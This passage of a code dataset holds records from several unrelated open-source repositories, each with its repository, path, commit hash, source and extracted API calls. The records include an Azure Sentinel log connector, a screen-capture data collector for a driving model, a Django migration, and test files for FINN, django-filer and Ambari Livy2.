monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((960, 980), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(1)'], {}), '([x, y], 1)\n', (969, 980), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1013, 1033), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(2)'], {}), '([x, y], 2)\n', (1022, 1033), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1083, 1103), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(3)'], {}), '([x, y], 3)\n', (1092, 1103), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n')] |
johnbilliris/Azure-Sentinel | Solutions/TenableIO/Data Connectors/azure_sentinel.py | ef3c2e3919023e80e15a94544e06e37623e7c1d3 | import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
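        # Builds the "SharedKey <workspace_id>:<hash>" Authorization header value: an HMAC-SHA256 over the
        # request metadata (method, length, content type, x-ms-date, resource), base64-encoded, as expected
        # by the Azure Log Analytics HTTP Data Collector API that this class posts to.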
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
logging.warn("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
| [((1128, 1165), 'base64.b64decode', 'base64.b64decode', (['self._workspace_key'], {}), '(self._workspace_key)\n', (1144, 1165), False, 'import base64\n'), ((1466, 1526), 'logging.info', 'logging.info', (['"""constructing post to send to Azure Sentinel."""'], {}), "('constructing post to send to Azure Sentinel.')\n", (1478, 1526), False, 'import logging\n'), ((1745, 1777), 'logging.info', 'logging.info', (['"""build signature."""'], {}), "('build signature.')\n", (1757, 1777), False, 'import logging\n'), ((1901, 1933), 'logging.info', 'logging.info', (['"""signature built."""'], {}), "('signature built.')\n", (1913, 1933), False, 'import logging\n'), ((2208, 2255), 'logging.info', 'logging.info', (['"""sending post to Azure Sentinel."""'], {}), "('sending post to Azure Sentinel.')\n", (2220, 2255), False, 'import logging\n'), ((2275, 2321), 'requests.post', 'requests.post', (['uri'], {'data': 'body', 'headers': 'headers'}), '(uri, data=body, headers=headers)\n', (2288, 2321), False, 'import requests\n'), ((2330, 2364), 'logging.info', 'logging.info', (['response.status_code'], {}), '(response.status_code)\n', (2342, 2364), False, 'import logging\n'), ((1646, 1663), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1661, 1663), False, 'from datetime import datetime\n'), ((1206, 1268), 'hmac.new', 'hmac.new', (['decoded_key', 'bytes_to_hash'], {'digestmod': 'hashlib.sha256'}), '(decoded_key, bytes_to_hash, digestmod=hashlib.sha256)\n', (1214, 1268), False, 'import hmac\n')] |
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion | MiniProject.py | 42d79fc262d60ecc9eebbe0e77a1576a04979501 | from tkinter import *
from PIL import ImageGrab
import numpy as np
import cv2
import time
import pyautogui as pg
import DirectInputRoutines as DIR
from LogKey import key_check
last_time = time.time()
one_hot = [0, 0, 0, 0, 0, 0]
hash_dict = {'w':0, 's':1, 'a':2, 'd':3, 'c':4, 'v':5}
X = []
y = []
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def process_img(original_image):
processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
vertices = np.array([[10,500],[10,300],[300,200],[500,200],[800,300],[800,500],
], np.int32)
processed_img = cv2.GaussianBlur(processed_img,(5,5),0)
processed_img = roi(processed_img, [vertices])
# more info: http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_houghlines/py_houghlines.html
# edges rho theta thresh # min length, max gap:
#lines = cv2.HoughLinesP(processed_img, 1, np.pi/180, 180, 20, 15)
#draw_lines(processed_img,lines)
return processed_img
def roi(img, vertices):
#blank mask:
mask = np.zeros_like(img)
# fill the mask
cv2.fillPoly(mask, vertices, 255)
# now only show the area that is the mask
masked = cv2.bitwise_and(img, mask)
return masked
def draw_lines(img,lines):
for line in lines:
coords = line[0]
cv2.line(img, (coords[0], coords[1]), (coords[2], coords[3]), [255,255,255], 3)
def change_tab():
pg.hotkey("alt","tab")
def send_key(e):
hash = {"w":DIR.W, "a":DIR.A, "s":DIR.S, "d":DIR.D}
return hash[e.keysym]
def keyup(e):
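    # On key release: clear this key's slot in the one-hot label, forward the release to the game window
    # (via alt-tab), then grab and preprocess a screen frame and record the (frame, label) training pair.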
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
#print('down', e.keysym)
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 0
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,640)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen, temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
#cv2.imshow("image", printscreen)
def keydown(e):
#print('up', e.keysym)
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
change_tab()
    DIR.PressKey(send_key(e))  # key-down should press, not release (assumes DirectInputRoutines exposes PressKey alongside ReleaseKey)
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 1
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,680)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen,temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
root = Tk()
frame = Frame(root, width=100, height=100)
frame.bind("<KeyPress>", keydown)
frame.bind("<KeyRelease>", keyup)
frame.pack()
frame.focus_set()
root.mainloop()
np.save("X.npy", X)
np.save("y.npy", y) | [((196, 207), 'time.time', 'time.time', ([], {}), '()\n', (205, 207), False, 'import time\n'), ((3513, 3532), 'numpy.save', 'np.save', (['"""X.npy"""', 'X'], {}), "('X.npy', X)\n", (3520, 3532), True, 'import numpy as np\n'), ((3534, 3553), 'numpy.save', 'np.save', (['"""y.npy"""', 'y'], {}), "('y.npy', y)\n", (3541, 3553), True, 'import numpy as np\n'), ((419, 435), 'numpy.median', 'np.median', (['image'], {}), '(image)\n', (428, 435), True, 'import numpy as np\n'), ((597, 627), 'cv2.Canny', 'cv2.Canny', (['image', 'lower', 'upper'], {}), '(image, lower, upper)\n', (606, 627), False, 'import cv2\n'), ((725, 773), 'cv2.cvtColor', 'cv2.cvtColor', (['original_image', 'cv2.COLOR_BGR2GRAY'], {}), '(original_image, cv2.COLOR_BGR2GRAY)\n', (737, 773), False, 'import cv2\n'), ((795, 851), 'cv2.Canny', 'cv2.Canny', (['processed_img'], {'threshold1': '(200)', 'threshold2': '(300)'}), '(processed_img, threshold1=200, threshold2=300)\n', (804, 851), False, 'import cv2\n'), ((873, 929), 'cv2.Canny', 'cv2.Canny', (['processed_img'], {'threshold1': '(200)', 'threshold2': '(300)'}), '(processed_img, threshold1=200, threshold2=300)\n', (882, 929), False, 'import cv2\n'), ((1031, 1126), 'numpy.array', 'np.array', (['[[10, 500], [10, 300], [300, 200], [500, 200], [800, 300], [800, 500]]', 'np.int32'], {}), '([[10, 500], [10, 300], [300, 200], [500, 200], [800, 300], [800, \n 500]], np.int32)\n', (1039, 1126), True, 'import numpy as np\n'), ((1162, 1204), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['processed_img', '(5, 5)', '(0)'], {}), '(processed_img, (5, 5), 0)\n', (1178, 1204), False, 'import cv2\n'), ((1679, 1697), 'numpy.zeros_like', 'np.zeros_like', (['img'], {}), '(img)\n', (1692, 1697), True, 'import numpy as np\n'), ((1724, 1757), 'cv2.fillPoly', 'cv2.fillPoly', (['mask', 'vertices', '(255)'], {}), '(mask, vertices, 255)\n', (1736, 1757), False, 'import cv2\n'), ((1819, 1845), 'cv2.bitwise_and', 'cv2.bitwise_and', (['img', 'mask'], {}), '(img, mask)\n', (1834, 1845), False, 'import cv2\n'), ((2062, 2085), 'pyautogui.hotkey', 'pg.hotkey', (['"""alt"""', '"""tab"""'], {}), "('alt', 'tab')\n", (2071, 2085), True, 'import pyautogui as pg\n'), ((2684, 2695), 'time.time', 'time.time', ([], {}), '()\n', (2693, 2695), False, 'import time\n'), ((3274, 3285), 'time.time', 'time.time', ([], {}), '()\n', (3283, 3285), False, 'import time\n'), ((1956, 2042), 'cv2.line', 'cv2.line', (['img', '(coords[0], coords[1])', '(coords[2], coords[3])', '[255, 255, 255]', '(3)'], {}), '(img, (coords[0], coords[1]), (coords[2], coords[3]), [255, 255, \n 255], 3)\n', (1964, 2042), False, 'import cv2\n'), ((2489, 2527), 'PIL.ImageGrab.grab', 'ImageGrab.grab', ([], {'bbox': '(0, 40, 800, 640)'}), '(bbox=(0, 40, 800, 640))\n', (2503, 2527), False, 'from PIL import ImageGrab\n'), ((3080, 3118), 'PIL.ImageGrab.grab', 'ImageGrab.grab', ([], {'bbox': '(0, 40, 800, 680)'}), '(bbox=(0, 40, 800, 680))\n', (3094, 3118), False, 'from PIL import ImageGrab\n'), ((2611, 2622), 'time.time', 'time.time', ([], {}), '()\n', (2620, 2622), False, 'import time\n'), ((3202, 3213), 'time.time', 'time.time', ([], {}), '()\n', (3211, 3213), False, 'import time\n')] |
jielyu/notebook | src/code/djangotest/migrations/0001_initial.py | d0c0d0306fdb2746195c9d7851af25d0393a311d | # Generated by Django 2.2.5 on 2019-10-05 23:22
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Password',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('website', models.CharField(max_length=128)),
('username', models.CharField(max_length=128)),
('pwd', models.CharField(max_length=128)),
('time_add', models.DateTimeField(auto_now_add=True, null=True)),
('time_modify', models.DateTimeField(auto_now=True)),
],
options={
'db_table': 'password_tab',
},
),
]
| [((304, 371), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'primary_key': '(True)', 'serialize': '(False)', 'unique': '(True)'}), '(primary_key=True, serialize=False, unique=True)\n', (323, 371), False, 'from django.db import migrations, models\n'), ((402, 434), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (418, 434), False, 'from django.db import migrations, models\n'), ((466, 498), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (482, 498), False, 'from django.db import migrations, models\n'), ((525, 557), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (541, 557), False, 'from django.db import migrations, models\n'), ((589, 639), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (609, 639), False, 'from django.db import migrations, models\n'), ((674, 709), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (694, 709), False, 'from django.db import migrations, models\n')] |
pbs/django-filer | filer/tests/utils/__init__.py | c862a84d4e1d86c14eeb509e341f6a7d39a421bf | from django.template.loaders.base import Loader as BaseLoader
from django.template.base import TemplateDoesNotExist
class Mock():
pass
class MockLoader(BaseLoader):
is_usable = True
def load_template_source(self, template_name, template_dirs=None):
if template_name == 'cms_mock_template.html':
return '<div></div>', 'template.html'
elif template_name == '404.html':
return "404 Not Found", "404.html"
else:
raise TemplateDoesNotExist()
| [((492, 514), 'django.template.base.TemplateDoesNotExist', 'TemplateDoesNotExist', ([], {}), '()\n', (512, 514), False, 'from django.template.base import TemplateDoesNotExist\n')] |
davmre/sigvisa | utils/arrival_overlaps.py | 91a1f163b8f3a258dfb78d88a07f2a11da41bd04 | import sigvisa.database.db
from sigvisa.database.dataset import *
import sigvisa.utils.geog
cursor = database.db.connect().cursor()
detections, arid2num = read_detections(cursor, 1237680000, 1237680000 + 168 * 3600, arrival_table="leb_arrival", noarrays=False)
last_det = dict()
overlaps = 0
for det in detections:
site = det[0]
time = det[2]
if site in last_det:
gap = time - last_det[site]
if gap < 5:
print " arrival %d at siteid %d occured %f seconds after previous at %f : phase %s" % (det[1], site, gap, last_det[site], det[DET_PHASE_COL])
overlaps = overlaps + 1
last_det[site] = time
print "total overlaps: ", overlaps, " out of ", len(detections), " detections"
| [] |
mmrahorovic/finn | tests/transformation/streamline/test_move_identical_op_past_join_op.py | d1cc9cf94f1c33354cc169c5a6517314d0e94e3b | import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
| [((1846, 1907), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""perm"""', '[[0, 3, 1, 2], [0, 2, 3, 1]]'], {}), "('perm', [[0, 3, 1, 2], [0, 2, 3, 1]])\n", (1869, 1907), False, 'import pytest\n'), ((533, 628), 'onnx.helper.make_node', 'oh.make_node', (['"""Transpose"""'], {'inputs': "['in_transpose1']", 'outputs': "['out_transpose1']", 'perm': 'perm'}), "('Transpose', inputs=['in_transpose1'], outputs=[\n 'out_transpose1'], perm=perm)\n", (545, 628), True, 'from onnx import helper as oh\n'), ((661, 756), 'onnx.helper.make_node', 'oh.make_node', (['"""Transpose"""'], {'inputs': "['in_transpose2']", 'outputs': "['out_transpose2']", 'perm': 'perm'}), "('Transpose', inputs=['in_transpose2'], outputs=[\n 'out_transpose2'], perm=perm)\n", (673, 756), True, 'from onnx import helper as oh\n'), ((784, 876), 'onnx.helper.make_node', 'oh.make_node', (['"""Add"""'], {'inputs': "['out_transpose1', 'out_transpose2']", 'outputs': "['out_join1']"}), "('Add', inputs=['out_transpose1', 'out_transpose2'], outputs=[\n 'out_join1'])\n", (796, 876), True, 'from onnx import helper as oh\n'), ((907, 978), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""in_transpose1"""', 'TensorProto.FLOAT', 'in_shape'], {}), "('in_transpose1', TensorProto.FLOAT, in_shape)\n", (932, 978), True, 'from onnx import helper as oh\n'), ((1013, 1084), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""in_transpose2"""', 'TensorProto.FLOAT', 'in_shape'], {}), "('in_transpose2', TensorProto.FLOAT, in_shape)\n", (1038, 1084), True, 'from onnx import helper as oh\n'), ((1120, 1193), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_transpose1"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_transpose1', TensorProto.FLOAT, out_shape)\n", (1145, 1193), True, 'from onnx import helper as oh\n'), ((1229, 1302), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_transpose2"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_transpose2', TensorProto.FLOAT, out_shape)\n", (1254, 1302), True, 'from onnx import helper as oh\n'), ((1333, 1401), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_join1"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_join1', TensorProto.FLOAT, out_shape)\n", (1358, 1401), True, 'from onnx import helper as oh\n'), ((1415, 1616), 'onnx.helper.make_graph', 'oh.make_graph', ([], {'nodes': '[Transpose1_node, Transpose2_node, Join1_node]', 'name': '"""test_graph"""', 'inputs': '[in_transpose1, in_transpose2]', 'outputs': '[out_join1]', 'value_info': '[out_transpose1, out_transpose2]'}), "(nodes=[Transpose1_node, Transpose2_node, Join1_node], name=\n 'test_graph', inputs=[in_transpose1, in_transpose2], outputs=[out_join1\n ], value_info=[out_transpose1, out_transpose2])\n", (1428, 1616), True, 'from onnx import helper as oh\n'), ((1707, 1755), 'onnx.helper.make_model', 'oh.make_model', (['graph'], {'producer_name': '"""test_model"""'}), "(graph, producer_name='test_model')\n", (1720, 1755), True, 'from onnx import helper as oh\n'), ((1768, 1792), 'finn.core.modelwrapper.ModelWrapper', 'ModelWrapper', (['onnx_model'], {}), '(onnx_model)\n', (1780, 1792), False, 'from finn.core.modelwrapper import ModelWrapper\n'), ((2333, 2377), 'finn.util.basic.gen_finn_dt_tensor', 'gen_finn_dt_tensor', (['input_dtype', 'input_shape'], {}), '(input_dtype, input_shape)\n', (2351, 2377), False, 'from finn.util.basic import gen_finn_dt_tensor\n'), ((2573, 2632), 'finn.core.onnx_exec.compare_execution', 
'oxe.compare_execution', (['model', 'model_transformed', 'input_dict'], {}), '(model, model_transformed, input_dict)\n', (2594, 2632), True, 'import finn.core.onnx_exec as oxe\n'), ((2533, 2559), 'finn.transformation.streamline.reorder.MoveTransposePastJoinAdd', 'MoveTransposePastJoinAdd', ([], {}), '()\n', (2557, 2559), False, 'from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd\n')] |
jchrisfarris/antiope-scorecards | app/lib/ncr_util.py | 82a1e228f4bd23f756c1dec8c0582fcde98de564 | import json
from lib import authz
from lib.logger import logger
from lib.exclusions import exclusions, state_machine
def get_allowed_actions(user, account_id, requirement, exclusion):
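    # Work out which actions (remediate, request exclusion, request exclusion change) this user may take,
    # based on the exclusion's allowed state-machine transitions and the authz checks below.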
allowed_actions = {
'remediate': False,
'requestExclusion': False,
'requestExclusionChange': False,
}
current_state = exclusions.get_state(exclusion)
valid_state_transitions = state_machine.USER_STATE_TRANSITIONS.get(current_state, {}).keys()
logger.debug('Current state: %s', current_state)
logger.debug('Valid state transitions: %s', str(valid_state_transitions))
logger.debug('User: %s', json.dumps(user))
if authz.can_request_exclusion(user, account_id)[0]:
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_STATES):
allowed_actions['requestExclusion'] = True
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_CHANGE_STATES):
allowed_actions['requestExclusionChange'] = True
    # Determine if the requirement can be remediated
if can_requirement_be_remediated(requirement):
allowed_actions['remediate'] = authz.can_remediate(user, account_id)[0]
return allowed_actions
def can_requirement_be_remediated(requirement):
"""
    Method to validate whether a requirement is capable of being remediated.
:param requirement: The dict representing the requirement to check.
:returns bool: A boolean representing whether requirement can or cannot be remediated.
"""
return 'remediation' in requirement
| [((341, 372), 'lib.exclusions.exclusions.get_state', 'exclusions.get_state', (['exclusion'], {}), '(exclusion)\n', (361, 372), False, 'from lib.exclusions import exclusions, state_machine\n'), ((474, 522), 'lib.logger.logger.debug', 'logger.debug', (['"""Current state: %s"""', 'current_state'], {}), "('Current state: %s', current_state)\n", (486, 522), False, 'from lib.logger import logger\n'), ((630, 646), 'json.dumps', 'json.dumps', (['user'], {}), '(user)\n', (640, 646), False, 'import json\n'), ((656, 701), 'lib.authz.can_request_exclusion', 'authz.can_request_exclusion', (['user', 'account_id'], {}), '(user, account_id)\n', (683, 701), False, 'from lib import authz\n'), ((403, 462), 'lib.exclusions.state_machine.USER_STATE_TRANSITIONS.get', 'state_machine.USER_STATE_TRANSITIONS.get', (['current_state', '{}'], {}), '(current_state, {})\n', (443, 462), False, 'from lib.exclusions import exclusions, state_machine\n'), ((1121, 1158), 'lib.authz.can_remediate', 'authz.can_remediate', (['user', 'account_id'], {}), '(user, account_id)\n', (1140, 1158), False, 'from lib import authz\n')] |
Syndra/Ambari-source | ambari-server/src/test/python/stacks/2.6/SPARK2/test_spark_livy2.py | 717526b2bf3636622212b14de0d3d298a20c7370 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
from mock.mock import MagicMock, patch
from stacks.utils.RMFTestCase import *
from only_for_platform import not_for_platform, PLATFORM_WINDOWS
@not_for_platform(PLATFORM_WINDOWS)
@patch("resource_management.libraries.functions.get_stack_version", new=MagicMock(return_value="2.5.0.0-1597"))
class TestSparkClient(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "SPARK2/2.0.0/package"
STACK_VERSION = "2.6"
DEFAULT_IMMUTABLE_PATHS = ['/apps/hive/warehouse', '/apps/falcon', '/mr-history/done', '/app-logs', '/tmp']
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/livy2_server.py",
classname = "LivyServer",
command = "start",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_start_default()
self.assertNoMoreResources()
def assert_start_default(self):
self.assertResourceCalled('Directory', '/var/run/livy2',
owner = 'livy',
group = 'hadoop',
create_parents = True,
mode = 0775
)
self.assertResourceCalled('Directory', '/var/log/livy2',
owner = 'livy',
group = 'hadoop',
create_parents = True,
mode = 0775
)
self.assertResourceCalled('HdfsResource', '/user/livy',
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
owner = 'livy',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
type = 'directory',
action = ['create_on_execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
mode = 0775,
)
self.assertResourceCalled('HdfsResource', None,
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
action = ['execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
)
self.assertResourceCalled('HdfsResource', '/livy2-recovery',
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
owner = 'livy',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
type = 'directory',
action = ['create_on_execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
mode = 0700,
)
self.assertResourceCalled('HdfsResource', None,
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
action = ['execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/livy-env.sh',
content = InlineTemplate(self.getConfig()['configurations']['livy2-env']['content']),
owner = 'livy',
group = 'livy',
mode = 0644,
)
self.assertResourceCalled('PropertiesFile', '/usr/hdp/current/livy2-server/conf/livy.conf',
owner = 'livy',
key_value_delimiter = ' ',
group = 'livy',
properties = self.getConfig()['configurations']['livy2-conf'],
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/log4j.properties',
content = '\n # Set everything to be logged to the console\n log4j.rootCategory=INFO, console\n log4j.appender.console=org.apache.log4j.ConsoleAppender\n log4j.appender.console.target=System.err\n log4j.appender.console.layout=org.apache.log4j.PatternLayout\n log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n\n\n log4j.logger.org.eclipse.jetty=WARN',
owner = 'livy',
group = 'livy',
mode = 0644,
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/spark-blacklist.conf',
content = self.getConfig()['configurations']['livy2-spark-blacklist']['content'],
owner = 'livy',
group = 'livy',
mode = 0644,
)
